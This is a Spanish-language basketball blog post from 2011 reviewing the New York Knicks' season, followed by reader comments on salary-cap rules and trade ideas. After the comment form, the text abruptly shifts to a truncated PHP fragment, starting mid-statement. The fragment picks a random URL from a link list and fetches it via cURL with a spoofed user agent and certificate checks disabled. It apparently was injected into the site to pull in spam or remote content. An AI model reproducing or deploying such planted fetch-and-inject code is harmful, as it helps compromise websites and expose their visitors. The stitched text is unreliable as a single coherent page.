New York Knicks: Notable

02 de July de 2011 por Hynreck

La temporada de New York ha tenido dos partes claramente diferenciadas: La era Pre-Carmelo y la era Post-Carmelo. La primera parte de la temporada nos descubrió a un colosal Amare, que lejos de echar de menos a Steve Nash, encontró en Raymond Felton a su socio perfecto, de tal manera que incluso incrementó sus números respecto a su época de Phoenix, entrando merecidamente en las quinielas para el MVP de la liga regular. Felton por su parte también estaba haciendo su mejor temporada en la liga, abonándose a los dobles dígitos en puntos y asistencias  y manejando el ritmo de un equipo alegre y desinhibido. Wilson Chandler y Danilo Gallinari aportaban su importante contribución y el rookie Landry Fields se convertía en la más grata sorpresa de la temporada.

Tras el trade con Denver, el equipo se convirtió en bipolar, perdió mucha profundidad de plantilla y bajó de nivel. Billups no mejoró a Felton y Anthony, si bien no rindió mal tampoco hizo mejores a sus compañeros. Tambien se juntó el lógico bajón de Amare, casualidad o causalidad da lo mismo. Unos Celtics en primera ronda  fueron demasiado para los pupilos de D’Antoni que si bien ofrecieron resistencia, no fue suficiente.

Tras muchas temporadas decepcionantes en New York se mira hacia el futuro con cierto optimismo, hay 2 jugadores que se pueden considerar franquicia y ahora sí es un destino apetecible para otros.

Lo mejor: La primera parte de la temporada de Amare y Felton, ambos a nivel All-Star. El descubrimiento de Landry Fields.

Lo peor: La llegada de Carmelo Anthony no supuso una mejora, en realidad el equipo bajó el nivel. Quedan dudas sobre su compatibilidad con Sotudamire. La plantilla hoy por hoy es demasiado corta para poder competir al máximo nivel.

Jugando a GM

Ni de Shumpert ni de Harrelson, las 2 elecciones del draft, se espera una aportación inmediata. Mediante traspasos, nada de lo que puedan ofrecer puede ser medianamente atractivo, ya sea por nivel o por contrato (caso de Billups). La única vía de mejora sería la Mid-Level excepción de la que disponen. Necesitan un interior que ayude a Amare y le libere del trabajo sucio. Ahí podrían entrar desde las incógnitas en forma de lesiones como Przybilla, Yao y Oden o cruzar los dedos y apostar por un Dalembert o un Kwame Brown.

Comenta

28 comentarios a esta entrada

  1. Denise dice:
    #1

    Bien, ya tenemos a los Knicks aquí para darles caña…. 🙂

    Muy chungo veo la cosa. Para empezar la plantilla es demasiado corta, el único objetivo debería ser entrar en Playoffs y poco más, y sobre el 2012, sólo tienen actualmente 4 jugadores con contrato en vigor (Melo, Amare, Balkman y Toney Douglas), todo ello le supone 41 millones de dólares, por lo que tendrían sólo unos 19 para fichar, ya que a lo mejor me equivoco porque no me sé todas las reglas de los salarios, pero creo que el límite sólo se puede superar mediante renovaciones, no mediante adquisiciones.
    Para colmo, la sorpresa positiva como bien decís, Landry Fields, acaba contrato y en el verano de 2012 pediría como mínimo la Mid Level, supongamos que se la dan…, y nos quedan Amare-Melo-Douglas-Fields y Balkman
    ¿Alguién cree que con 19 kilos se puede rodear a Melo y Amare con otros 4-5 jugadores de calidad? Yo creo que no.
    Jugando a GM
    Traspasaría a Amare por 3-4 jugadores de nivel medio-alto como ya dije en la entrada de los Sixers, pero reconozco que sería una decisión impopular. Me había olvidado de Billups, por tanto lo mejor es que este año traspasen a Billups por 2-3 jugadores, para hacer la plantilla más larga y porque Billups está acabadísimo. Aún así, si quieren conseguir un anillo, con la pareja Melo-Amare y lo mucho que cobran, lo veo muy chungo, suenan Paul y Howard, pero, es dificil ganar un anillo con 3 estrellas rodeados por 6 mataos, y además el trío Melo-Amare-Paul/Howard no sería tan determinante como el de Miami.

      Citar

  2. Esteban dice:
    #2

    apuesta por oden, cambio de turiaf por algun jugaodr no querido en otro equipo

    sacarle el mayor jugo posible billups o traspasarlo por varios jugadores que le pueden rendir al equipo, propùestas se escucha, SOBRETODO DE LOS BUCKS

      Citar

  3. Viva_Dirk dice:
    #3

    Esta claro que los Knicks ficharan otra estrella en 2012, es mas necesario Paul pero una pareja interior Amare-Howard es una bestialidad y mas aun con un alero fortísimo como Melo. Los iran rodeando con excepciones, mid leve, bianual y mínimos, además de renovaciones con las cuales pueden ir pasandose del límite.

    Y no coincido en que no se espere nada de los rookies. Shumpert es un base correcto que perfectamente podria tener minutos cuando Douglas juegue de 2, y Harrelson es un center que al fin y al cabo no tienen ninguno.

      Citar

  4. Esteban dice:
    #4

    DIGO, ME EXPLICO MEJOR, traspasar a billups como expining de 14 millones mientras puede jugar es un activo pocas veces visto en la nba, Q TE PARECE SARFD?

    ahy entras dos jugadores de 7 millones al año, o tres 5 q pueden tener contratos de aca a 3 o 4 años mas, en total, la proxima temporada los NY estarian en 75 millones, sin grandas incoroporaciones ni grandes mivimientos

    esta claro como funciona?

      Citar

  5. Esteban dice:
    #5

    ah sarfd, walker, douglas y fields pueden q HOY no valgan NAD Y ESO ES LO Q NECESITA ny HOY, Q ESTOS TRES JUGADORES

      Citar

  6. Esteban dice:
    #6

    q entraran en la rotacion no valgan nada asi tiene dinero este año para agentes libres, el año proximo renovaran por mas dinero y asi los knicks aumentaran su espacio en el tope, y poraian trasapar a esos jugadores pro otros con menos proyeccion y mas presente

    nadie entiende este o q? alguien sabe como excepcionarse del tope? cuanto mas baratos tus jugarores, mas caro los mrenovaras, mas te alejas del tope, GENTE ESTO ES LO BASICO ni mas ni menos

      Citar

  7. JHC dice:
    #7

    Yo creo k la apuesta de Knicks de hacerse con 3 superestrellas no tiene ninguna base para triunfar, yo me kedaria con estos dos y los intentaria acompañar mejor, aun asi no veo posibilidad en el futuro de ganar un anillo Melo y Amare se llevan la mitad del dinero, su mayor basa es intentar conseguir un jugador veterano que quiera intentar la caza del anilo y que no pida cobrar mucho

      Citar

  8. Esteban dice:
    #8

    jhc creo q seran muchos los veteranos q qyieran un anillo y ademas vivir en NY, pues a mi me encantaria jejeje

      Citar

  9. Hynreck dice:
    #9

    Corrección, el artículo estaba escrito antes de que Portlan ejercera la qualifying offer por Oden, al ejercerla por unos 8 millones NY no podría optar por él con la mid-level

      Citar

  10. Txusma dice:
    #10

    Ya lo comenté en el post de los Sixers. Que Oden haya recibido la Qualyfing Offer de los Blzers no significa que vaya a cobrar más de 8 kilos. Si los Knicks le presentan una oferta por la MidLevel y 4 años, por ejemplo, y Oden la acepta, los Blazers han de decidir si igualar o no. Si Oden no aceptara ninguna de las ofertas que le llegara o no le llegara ninguna entonces sí q cobraría 8’8 millones durante un año y luego sería agente libre sin restricciones.

      Citar

  11. Cocinitas dice:
    #11

    Dificil panorama se presenta en la gran manzana, partiendo de la base Melo- Amare yo buscaria el traspaso de Billups por un par de jugadores uno de ellos ha de ser un base quizá un trade con Detroit Stuckey, el problema es que es agente libre restringido pero sinonse sube a la parra y firma por 6-7 kilos seria un salario asumible para los Knicks, aun asi hay que cuadrar los salarios con algun jugador más puede que sea util para la rotación de NY. Con este trade los Pistons recuperarian a un base con un expiring de 14 kilos y que puede ser un gran maestro para Brandon Knight. Intentaria conseguir un pivot con la mid level Dalembert seria el ideal. Lo de un big-three en NY no lo veo viable ni económica ni deportivamente.

      Citar

  12. Vader dice:
    #12

    Estoy en el pueblo leyendo con el Iphone así que me reservaré un comentario más largo cuando vuelva a casa. Sólo quiero comentar una cosa, en mi opinión los Knicks deberian centrar sus esfuerzos en ir a por Howard y juntarlo con Melo. Luego ya no tengo tan claro si es mejor mantener a Stat, o hacer un big three diferente con CP3 o Deron o “sólo” Melo+Howard y rodearlos con varios jugadores de nivel medio…

    Pero vamos que soy bastante optimista y como ya he dicho muchas veces aún más viniendo de donde venimos… Por lo menos ya somos un equipo fijo de playoff y estoy seguro que algún año como mínimo oleremos el anillo!!

    Saludos

      Citar

  13. Denise dice:
    #13

    A 2 de Julio de 2011, creo que las continuas lesiones harán que Oden sea un bluff. Yo no me la jugaría y no me arriesgaría en invertir un pastizal en él.

      Citar

  14. Hynreck dice:
    #14

    Fallo mío entonces Txus. Pensé que al ejercer la oferta cualificada no se le podría ofrecer menos de ella.

      Citar

  15. Esteban dice:
    #15

    oden puede ser un blufff pero creo q vale la pena arriesgarse, no sera el nuevo shaq como pinto en algun momento, pero aun asi es un pivote gigante y agil, y creo q sus lesiones terminaran en algun monento, quiza no sera una bestia, pero la falta de pivots q hay, aun en media pierna tendria q jugar

    pensar q miami jugo contra ny, con ilgauskas, jugo magliore o dampier durante la temporada, se ve q faltan internos, oden minimamente deberia poder jugar de titular, por lo menos, aun desp de las lesiones podria ser un pivot de 10 puntos y 5 rebotes, no es poco con la faltan de internos

      Citar

  16. safd dice:
    #16

    Uno no puede dar 20K por 4 años a un tío que va a jugar como mucho 20-25mpp y cuya última imágen en público fue con un bastón, sería arriesgarse mucho, Portland lo hace porque aún tiene que justificar la elección de 2007.

      Citar

  17. Esteban dice:
    #17

    para sarf que considera que los knicks no seran una potencia, es secreto a voces que se olvidaron de howard, y la prox temporada le pagar 12 kilos a nene hilario para hacer dupla con amare, aun crees que atlanta es mejor? jeje

      Citar

  18. safd dice:
    #18

    … Nene creo que no puede fichar por 12K no? cuando se sobrepasa el límite solo se podía fichar con la Mid-Level la Bianual y el mínimo y renovar con las excepciones de Bird y to eso…
    Alguien nos lo puede explicar mejor?

    Esteban eso solo son rumores para vender periodicos, igual que cada año el Marca cuando no sabe a quien colocar en el Madrid de futbol, dice Cesc xd.

      Citar

  19. Txusma dice:
    #19

    Efectivamente. Cuando un equipo está por encima del límite tan solo puede fichar gracias a las excepcions y no hay ninguna que contemple un salario de 12kilos. Este año ya es imposible a no ser que se pongan por debajo del límite de alguna manera (traspasando a Billups y Turiaf x algún jugador que acabe contrato, por ejemplo).

      Citar

  20. Esteban dice:
    #20

    txuma, creo q por ahy viene la mano, sobre todo la salida de turiaf, NY tiene 61 millones, no esta por ensima del tope

      Citar

  21. Vader dice:
    #21

    Pero creo que aunque no estes por encima del tope solo puedes ofrecer un contrato entre la distancia que pagues de salarios y el tope. Por ejemplo si gastas 57 y el tope son 60 puedes ofrecer un contrato de 3 millones y luego la mid-level, bi-anual, etc…

    Al ejercer la option sobre Billups los Knicks se quitan de la carrera por los agentes libres de este año y declaran su clara intención de ir a por otra mega-estrella el año que viene. Llamese Chris Paul, Deron Williams o mi favorita Superman Howard.

    Saludos

      Citar

  22. Txusma dice:
    #22

    Esto de los limites es bastante complicado, no creais. Una vez organizamos una liga fantástica super realista que llevaba un compañero que se sabía al dedillo el convenio (que es donde se estipula todo esto) y os puedo asegurar que fue difícil pero instructivo.
    Si no me falla la memoria si tu estas 3 millones por debajo del límite puedes renunciar a la Mid Level (unos 5’2 kilos este año) y entonces esta se te acumula a estos 3 kilos, teniendo ya 8’2k para fichar. Renunciando a la bianual (1’8) te quedaría en 10. No sé si por ahí van los tiros los Knicks.

      Citar

  23. Esteban dice:
    #23

    si yo sinceramente no me se todos los trucos del tope, pero se que esta temporada fue flexible, se lo basico, pero se lo puede saltear de diferentes formas

    por ejemplo la semana pasada un directivo de NY, dijo que buscan jugadores de un año de contrato para fichar el proximo añoi tanto a CP3 Y HOWARD, si no pudiesen salirse del tope esto es imposible, por mas 14 millones que deje billups, sin dudas las excepciones son acumulables, tamb son acumulables los trade sxeption, como tambien rokkies que no juegan entre otros miles de casos

    sino como es posible que dallas este en 90 millones, y siga incorporando jugadores año a año

    a partir de ahora no se como temrinara el lockout, los dueños quieren un tope fijo

      Citar

  24. Txusma dice:
    #24

    Los últimos jugadores importantes que ha incorporado Dallas (Chandler, Butler, Haywood, Marion) lo ha hecho gracias a traspasos, no ha excepciones salariales.
    Una vez estás por encima del máximo para aumentar tu carga salarial o utilizas las excepciones (que son las que son) o lo haces a través de las renovaciones. Fijaos que no es tan difícil. En cuanto un rookie acaba su contrato de 4 años, si es muy bueno (como Durant, por ejemplo) se le renueva por el máximo (q empezaba por 12 kilos y acababa en 17, creo recordar). Fijaos que fácil es pasarse.

    Pero vaya que yo no veo manera de juntar a Paul, Carmelo, Amare y Howard, a no ser q renuncien a una buena parte de los que les correspondería en otro equipo.

      Citar

  25. safd dice:
    #25

    Eso es adulterar la liga! Los nuevos Heat!!
    Serían otros q me cayesen mal…

      Citar

  26. Vader dice:
    #26

    De momento no es el caso ni de broma… Amare y Melo estan con contratos máximos para su edad. Uno de ellos firmo como agente libre y el otro vino con un sign and trade por el que se tuvieron que dar muchos jugadores y futuras rondas.

    Así que no se parece nada a los que han hecho los Heat que por otra parte tampoco no creo que sea adulterar la liga ni te da garantias de exito como se ha visto…

      Citar

  27. Esteban dice:
    #27

    los rookies eledigos via draft que siguen en europa, sus hipoteticos salarios siguen contando en el tope, como reservasm aunque no esten en el equipo, y estos pueden traspasarlos

    a los knicks les pasa con jerome jordan

      Citar

  28. safd dice:
    #28

    alguien podria decirme si NYK perderia mucho dinero por marketing y to eso cuando los Nets se vayan a NY? o no les afectara?

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>